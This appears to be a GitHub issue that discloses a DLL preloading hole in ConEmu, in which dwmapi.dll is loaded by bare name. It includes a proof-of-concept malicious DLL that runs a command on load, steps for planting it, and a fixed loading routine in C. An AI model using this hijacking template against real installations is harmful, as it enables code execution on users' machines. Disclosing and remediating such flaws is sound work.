
Attacker can execute arbitrary code using a DLL preloading attack. #2556

Open
comalmot opened this issue Nov 22, 2023 · 1 comment

@comalmot

Versions

ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe

Problem description

When ConEmu64.exe is executed, the CDwmHelper::InitDwm() method is invoked ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp ).

In this method, when loading dwmapi.dll, the LoadLibrary call has no flag to prevent DLL preloading:

mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));

So an attacker can place a malicious DLL file (named dwmapi.dll) in the directory where ConEmuPack is installed, and execute arbitrary code.

Steps to reproduce

  1. Generate a malicious DLL file:
#include "pch.h"
#include "framework.h"
#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

This code invokes calc.exe.

  2. Put it in the directory where ConEmuPack is installed, as dwmapi.dll.

  3. Just click ConEmu64.exe.

Actual results

ConEmu.exe and ConEmu64.exe must not be affected by DLL preloading.

Expected results

ConEmu.exe and ConEmu64.exe are affected by DLL preloading.

Additional files

PoC: 2023-11-22 23-40-42 (video attachment)

How to Solve

https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1

We can use an absolute path: the GetSystemDirectory() function can be used to combine the system directory path with the DLL file name (in this case, dwmapi.dll) to defend against it.

Sorry for my Bad English 😢
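The mitigation described in "How to Solve", written out as an added example (this is not ConEmu's code and not the reporter's): the system directory returned by GetSystemDirectory is joined with the bare DLL name so that LoadLibrary receives an absolute path and never consults the application directory. The helper names build_system_dll_path and load_system_dll are hypothetical. The path-building helper is portable C so it can be compiled and checked anywhere; the actual GetSystemDirectoryA/LoadLibraryA calls are compiled on Windows only.

```c
/* Added example: load a system DLL only from the Windows system directory,
 * as the issue's "How to Solve" section suggests. Not ConEmu's own code.
 * The path-building helper is portable; the Windows API calls are guarded. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Join a system directory (as returned by GetSystemDirectory, normally
 * without a trailing backslash) with a bare DLL file name into out.
 * Returns the number of characters written, or 0 on error: the result
 * would not fit in cap, or dllname is not a bare file name (a component
 * such as "..\\evil.dll" could otherwise escape the system directory). */
size_t build_system_dll_path(const char *sysdir, const char *dllname,
                             char *out, size_t cap)
{
    size_t dlen = strlen(sysdir);
    size_t nlen = strlen(dllname);
    if (dlen == 0 || nlen == 0) return 0;
    if (strpbrk(dllname, "\\/:") != NULL ||
        strcmp(dllname, ".") == 0 || strcmp(dllname, "..") == 0)
        return 0;

    /* Only add a separator if the directory does not already end in one
     * (GetSystemDirectory omits it except for a drive root). */
    int need_sep = sysdir[dlen - 1] != '\\' && sysdir[dlen - 1] != '/';
    size_t total = dlen + (need_sep ? 1u : 0u) + nlen;
    if (total + 1 > cap) return 0;

    memcpy(out, sysdir, dlen);
    size_t pos = dlen;
    if (need_sep) out[pos++] = '\\';
    memcpy(out + pos, dllname, nlen);
    out[total] = '\0';
    return total;
}

#ifdef _WIN32
/* Load a DLL by absolute path under the system directory. Because the
 * path is absolute, LoadLibrary does not walk the DLL search order, so a
 * file of the same name next to the executable is never considered.
 * Returns NULL on failure. */
HMODULE load_system_dll(const char *dllname)
{
    char sysdir[MAX_PATH];
    char full[MAX_PATH];
    UINT n = GetSystemDirectoryA(sysdir, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) return NULL;
    if (build_system_dll_path(sysdir, dllname, full, sizeof full) == 0)
        return NULL;
    return LoadLibraryA(full);
}

int main(void)
{
    HMODULE h = load_system_dll("dwmapi.dll");
    printf("dwmapi.dll %s\n", h ? "loaded from the system directory" : "failed to load");
    if (h) FreeLibrary(h);
    return h ? 0 : 1;
}
#else
/* Non-Windows build: only exercise the path helper on a constructed input. */
int main(void)
{
    char buf[260];
    if (build_system_dll_path("C:\\Windows\\System32", "dwmapi.dll", buf, sizeof buf))
        printf("%s\n", buf);
    return 0;
}
#endif
```

On Windows 8 and later (or Windows 7 with the KB2533623 update) the same effect is available without building the path by hand: LoadLibraryEx with the LOAD_LIBRARY_SEARCH_SYSTEM32 flag restricts the search to the system directory. The explicit-path form above works on every Windows version and makes the intended location obvious when reading the code.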

@Maximus5 (Owner)

Thank you for raising the issue. I'll address this problem ASAP
